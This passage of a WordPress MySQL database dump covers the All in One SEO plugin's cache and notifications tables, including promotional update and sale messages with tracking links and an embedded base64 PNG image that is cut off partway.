05:14:42'),(420,'page_overview_data','a:5:{s:5:\"total\";i:8;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:4;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:4;}','2026-05-25 05:34:35','2026-05-18 05:34:35','2026-05-18 05:34:35'),(421,'project_overview_data','a:5:{s:5:\"total\";i:0;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:0;}','2026-05-25 05:34:35','2026-05-18 05:34:35','2026-05-18 05:34:35'),(422,'popupbuilder_overview_data','a:5:{s:5:\"total\";i:0;s:16:\"needsImprovement\";i:0;s:4:\"okay\";i:0;s:4:\"good\";i:0;s:21:\"withoutFocusKeyphrase\";i:0;}','2026-05-25 05:34:35','2026-05-18 05:34:35','2026-05-18 05:34:35'),(427,'show_notifications_drawer','b:1;','2026-05-21 05:14:43','2026-05-20 05:14:43','2026-05-20 05:14:43'); /*!40000 ALTER TABLE `wpln_aioseo_cache` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpln_aioseo_notifications` -- DROP TABLE IF EXISTS `wpln_aioseo_notifications`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!50503 SET character_set_client = utf8mb4 */; CREATE TABLE `wpln_aioseo_notifications` ( `id` bigint unsigned NOT NULL AUTO_INCREMENT, `slug` varchar(13) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `title` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `content` longtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `type` varchar(64) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `level` text CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci NOT NULL, `notification_id` bigint unsigned DEFAULT NULL, `notification_name` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, `start` datetime DEFAULT NULL, `end` datetime DEFAULT NULL, `button1_label` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, `button1_action` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, `button2_label` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, `button2_action` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_520_ci DEFAULT NULL, `dismissed` tinyint(1) NOT NULL DEFAULT '0', `new` tinyint(1) NOT NULL DEFAULT '1', `created` datetime NOT NULL, `updated` datetime NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `ndx_aioseo_notifications_slug` (`slug`), KEY `ndx_aioseo_notifications_dates` (`start`,`end`), KEY `ndx_aioseo_notifications_type` (`type`), KEY `ndx_aioseo_notifications_dismissed` (`dismissed`) ) ENGINE=MyISAM AUTO_INCREMENT=61 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpln_aioseo_notifications` -- LOCK TABLES `wpln_aioseo_notifications` WRITE; /*!40000 ALTER TABLE `wpln_aioseo_notifications` DISABLE KEYS */; INSERT INTO `wpln_aioseo_notifications` (`id`, `slug`, `title`, `content`, `type`, `level`, `notification_id`, `notification_name`, `start`, `end`, `button1_label`, `button1_action`, `button2_label`, `button2_action`, `dismissed`, `new`, `created`, `updated`) VALUES (1,'62bcef061139e','AIOSEO 4.2.2 is HERE with some great new features! 🎉','Connect your WordPress user profile directly to your social media accounts for improved SEO.\r\n<br><br>\r\nOur new Translations API enables third-party translation apps to hook into AIOSEO’s data for multilingual SEO.\r\n<br><br>\r\nUpdate to AIOSEO 4.2.2 now and enjoy more SEO opportunities!','success','[\"4-x\",\"lite\"]',338,NULL,'2022-06-28 14:12:59',NULL,'Learn More','https://aioseo.com/announcing-our-new-user-social-profile-tab-and-translation-api-in-aioseo-4-2-2/?utm_source=WordPress&utm_campaign=social-profiles-translations-api-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=social-profiles-translations-api-v4-lite&utm_medium=plugin-notification&utm_content=Get AIOSEO Pro',0,0,'2022-06-30 00:32:06','2022-06-30 00:32:06'),(2,'62bcef0612325','📣 Introducing Crawl Cleanup and Import URLs to Your Sitemap!','AIOSEO 4.2.1 now allows you to manage Search Engine crawl quota by removing query args (URL parameters) from selected URLs and disabling unnecessary RSS feeds.\r\n<br><br>\r\nYou can also import bulk URLs from a CSV file to add more pages to your sitemap.\r\n<br><br>\r\nUpdate to AIOSEO 4.2.1 to take advantage of these powerful SEO features today!','success','[\"4-x\",\"lite\"]',327,NULL,'2022-06-28 14:12:59',NULL,'Learn More','https://aioseo.com/introducing-crawl-cleanup-and-importing-urls-from-a-csv-file-to-your-sitemap/?utm_source=WordPress&utm_campaign=crawl-cleanup-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','Get AIOSEO Pro','https://aioseo.com/pricing/?utm_source=WordPress&utm_campaign=crawl-cleanup-v4-lite&utm_medium=plugin-notification&utm_content=Get%20AIOSEO%20Pro',0,0,'2022-06-30 00:32:06','2022-06-30 00:32:06'),(3,'62ff6e98d77f1','AIOSEO just got more powerful with version 4.2.4! 🚀','Easily eliminate 404 errors with <strong>automatic redirects</strong> using our massively improved Redirection Manager. \r\n<br><br>\r\nThis update also includes some huge improvements to our Image SEO addon, making it much easier for your content to rank. 📸\r\n<br><br>\r\nUpdate to <strong>AIOSEO 4.2.4</strong> today and take advantage of these powerful new features!','success','[\"4-x\",\"lite\"]',463,NULL,'2022-09-13 14:28:06',NULL,'Learn More','https://aioseo.com/announcing-aioseo-4-2-4-improved-redirects-and-image-seo-updates/?utm_source=WordPress&utm_campaign=improved-redirects-image-seo-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=improved-redirects-image-seo-v4-lite&utm_medium=plugin-notification&utm_content=Get%20AIOSEO%20Pro',0,0,'2022-08-19 11:06:00','2022-09-21 10:48:37'),(4,'62ff6e98d8704','📣 AIOSEO 4.2.3: Introducing FAQ and Table of Contents blocks + URL Slug Monitor.','You can now add <strong>FAQ and Table of Contents blocks</strong> to increase your visibility on SERPs and improve user experience.\r\n<br><br>\r\nAnd our <strong>URL Slug Monitor</strong> is a powerful addition that checks for changes in your URLs and prompts you to add redirects which helps <strong>prevents 404 errors</strong> on your site.\r\n<br><br>\r\nUpdate to 4.2.3 today and check out these powerful new features!','success','[\"4-x\",\"lite\"]',414,NULL,'2022-08-16 12:14:02',NULL,'Learn More','https://aioseo.com/introducing-aioseo-4-2-3-faq-and-table-of-contents-blocks-all-new-url-slug-monitor/?utm_source=WordPress&utm_campaign=introducing-faq-toc-blocks-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=introducing-faq-toc-blocks-vv-lite&utm_medium=plugin-notification&utm_content=Get AIOSEO Pro',0,0,'2022-08-19 11:06:00','2022-09-13 02:23:47'),(5,'6321ecfd56865','The Next-Gen Schema Generator is here! 🎉','This is a huge leap forward in WordPress schema implementation, and you definitely want to add it to boost your website SEO! 🚀\r\n<br><br>\r\nWebsites with schema markups enjoy better SEO rankings, higher traffic, and more sales. AIOSEO 4.2.5 makes it possible without touching a single line of code.\r\n<br><br>\r\nUpdate to AIOSEO 4.2.5 <strong>TODAY</strong> and enjoy the power of our <strong>new Schema Generator!</strong>','success','[\"4-x\",\"lite\"]',492,NULL,'2022-09-13 00:00:00',NULL,'Learn More','https://aioseo.com/announcing-aioseo-4-2-5-next-gen-schema-generator-to-improve-your-seo-rankings/?utm_source=WordPress&utm_campaign=schema-generator-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=schema-generator-v4-lite&utm_medium=plugin-notification&utm_content=Get AIOSEO Pro',0,0,'2022-09-14 15:02:21','2022-10-21 04:44:57'),(6,'635223c9dd0fe','The much-awaited SEO emoji picker is here! 🎉','Now you can add emojis to SEO fields to get <strong>higher CTRs and engagement on SEO and social media platforms</strong>. 😳\r\n<br><br>\r\nPlus, we’ve also greatly improved our multisite SEO module, making it easy to <strong>manage WordPress multisite SEO from a single dashboard</strong>. ✅\r\n<br><br>\r\nWith AIOSEO 4.2.6, you’ve got more tools to help you rank your content, and that <strong>without touching a single line of code</strong>. 🧑🏽💻\r\n<br><br>\r\n<strong>Update to AIOSEO 4.2.6 TODAY</strong> and enjoy the power of our new SEO emoji picker and improved multisite SEO module! 🚀','success','[\"4-x\",\"lite\"]',512,NULL,'2022-11-28 20:45:42',NULL,'Learn More','https://aioseo.com/announcing-aioseo-4-2-6-new-seo-emoji-picker-multisite-seo-improvements/?utm_source=WordPress&utm_campaign=emoji-picker-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','🚀 Get AIOSEO Pro NOW!','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=emoji-picker-v4-lite&utm_medium=plugin-notification&utm_content=🚀 Get AIOSEO Pro NOW!',0,0,'2022-10-21 04:44:57','2022-12-04 05:57:47'),(7,'6382047a17762','Black Friday: HUGE Sale! Get Up to 70% Off AIOSEO 🛍','Our biggest sale of the year is now live! Get up to 70% off AIOSEO, the world’s best WordPress SEO plugin. You’ll unlock our NEW Link Assistant addon, redirection manager, local SEO module, image SEO module, news/video sitemaps +more! PLUS enter our giveaway to WIN an Apple 14” M1 PRO Macbook Pro - no purchase necessary!','success','[\"4-x\",\"lite\"]',534,NULL,'2022-11-24 19:50:33','2022-11-28 00:00:00','Enter Giveaway','https://aioseo.com/black-friday/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=bf2022-enter-giveaway-v4-lite','Claim Your Upgrade Discount','https://aioseo.com/black-friday/?utm_source=WordPress&utm_campaign=liteplugin&utm_medium=Plugin Notification&utm_content=bf2022-claim-your-upgrade-discount-v4-lite',0,0,'2022-11-26 12:20:10','2022-11-26 12:20:10'),(8,'6382047a184b2','Announcing AIOSEO 4.2.7: Google Merchant Center Schema to help you Boost Visibility and Sales! 🛒💰','Do you sell products on your website? We’ve got great news for you!\r\n<br><br>\r\nEnjoy greater visibility and higher CTRs for your products on search engines with our new <strong>Google Merchant Center</strong> Listing schema support. \r\n<br><br>\r\nSo, go ahead and upgrade to <strong>AIOSEO Pro 4.2.7 TODAY</strong> and get more tools to help you rank your content and products!','success','[\"4-x\",\"lite\"]',526,NULL,'2022-12-06 20:35:55',NULL,'Learn More','https://aioseo.com/announcing-aioseo-4-2-7-drive-more-sales-with-google-merchant-center-listing-schema/?utm_source=WordPress&utm_campaign=google-merchant-center-schema-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=google-merchant-center-schema-v4-lite&utm_medium=plugin-notification&utm_content=Get AIOSEO Pro',0,0,'2022-11-26 12:20:10','2023-01-09 04:42:31'),(9,'63a3d53da8121','AIOSEO 4.2.8: More Control Over Search and Social Snippets with SEO Preview 🔎','Get greater control over how your search and social media snippets appear with our <strong>new SEO Preview tool</strong>.\r\n<br><br>\r\nPlus, check how well you’ve set up your page’s SEO by getting an overview of your meta tags and basic SEO.\r\n<br><br>\r\nSo, <strong>update to AIOSEO 4.2.8 TODAY</strong> and boost your rankings and drive more engagement on SERPs and social media!','success','[\"4-x\",\"lite\"]',560,NULL,'2022-12-06 20:35:55',NULL,'Learn More','https://aioseo.com/new-seo-preview-more-control-over-search-and-social-snippets/?utm_source=WordPress&utm_campaign=seo-preview-v4-lite&utm_medium=plugin-notification&utm_content=Learn More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=seo-preview-v4-lite&utm_medium=plugin-notification&utm_content=Get AIOSEO Pro',0,0,'2022-12-22 03:55:41','2023-01-09 04:42:31'),(10,'64754f0ba7098','[Last Chance!] 🇺🇸 Save up to 70% on AIOSEO during our flash sale! 🧨','Did you know today\'s the <span style=\"text-decoration:underline;\">last day</span> to <strong>upgrade</strong> & <strong>save big</strong> on the world\'s best SEO plugin?\r\n<br><br>\r\n⚡ Power up your traffic & sales with our futuristic <strong>AI tools</strong> & <strong>Google Search Console integration</strong>. ⚡\r\n<br><br>\r\nDon’t miss out on these sizzling deals. 💥\r\n<br><br>\r\nClaim your discount before it\'s gone!','success','[\"4-x\",\"lite\"]',721,NULL,'2023-05-30 00:00:00','2023-05-31 00:00:00','Get AIOSEO Pro Today!','https://aioseo.com/pricing-lite/?utm_source=WordPress&utm_campaign=v4-lite&utm_medium=Plugin%20Notification&utm_content=memorial-day-sale-last-chance-2023-get-aioseo-pro-today',NULL,NULL,0,0,'2023-05-30 01:19:07','2023-05-30 01:19:07'),(11,'64754f0ba7d9d','[Memorial Day Sale] 🇺🇸 Get up to 70% off AIOSEO! 💥','We just launched our Memorial Day sale! Snag <strong style=\"text-decoration: underline;\"><em>all</em></strong> the SEO features you want to surge traffic and sales. \r\n<ul style=\"list-style: inside;\">\r\n <li>Save time with our AI <strong>ChatGPT integration</strong>.</li>\r\n <li>Boost <strong>rankings</strong> with our <strong>Google Search Console integration</strong>.</li>\r\n</ul>\r\nFor only <strong style=\"text-decoration: underline;\">1 day</strong> you can get <strong>giant discounts</strong> on the world\'s best SEO plugin.\r\n<br /><br />\r\n⚡So grab your deal while it lasts! ⚡','success','[\"4-x\",\"lite\"]',708,NULL,'2023-05-29 13:43:06',NULL,'Get AIOSEO Pro Today!','https://aioseo.com/pricing-lite/?utm_source=WordPress&utm_campaign=v4-lite&utm_medium=Plugin%20Notification&utm_content=memorial-day-sale-2023-get-aioseo-pro-today',NULL,NULL,0,0,'2023-05-30 01:19:07','2023-05-30 01:19:07'),(12,'64754f0ba827b','🗣️ [AIOSEO 4.3.6] Announcing Content Rankings: SEO Performance Tracking Made Easy','Get valuable insights about how your content is performing on search engines using our <strong>NEW Content Rankings report</strong>.\r\n<br><br>\r\nThis includes SEO data to help you <strong>optimize your articles for better rankings</strong>. Plus, you can also easily spot <strong>content decay</strong>, making it easier to combat it.\r\n<br><br>\r\nSo, <strong>upgrade to AIOSEO Pro TODAY</strong> and boost your rankings and drive more traffic to your content!','success','[\"4-x\",\"lite\"]',677,NULL,'2023-06-27 12:55:16',NULL,'Learn More','https://aioseo.com/announcing-content-rankings-seo-performance-tracking-made-easy/?utm_source=WordPress&utm_campaign=content-rankings-v4-lite&utm_medium=plugin-notification&utm_content=Learn%20More','Get AIOSEO Pro','https://aioseo.com/lite-upgrade/?utm_source=WordPress&utm_campaign=content-rankings-v4-lite&utm_medium=plugin-notification&utm_content=Get%20AIOSEO%20Pro',0,0,'2023-05-30 01:19:07','2023-06-29 11:09:56'),(13,'64754f0ba8789','Introducing SEO Stats for WordPress - Track Your Keyword Rankings and See Important SEO Metrics with 1-click 🔎 🚀','Want to see exactly how your content ranks in search results inside of WordPress? You can do just that with our brand new <strong>Google Search Console integration</strong>!\r\n<br><br>\r\nTrack important keywords and get in-plugin tips to help you grow your traffic. <strong>Plus: Try out the new speed test tool!</strong> 🚀\r\n<br><br>\r\n<strong>Upgrade to AIOSEO 4.3.0 (Elite) TODAY to ignite your SEO and outrank competitors!</strong>\r\n<br><br>\r\n<img src=\"data:image/png;base64,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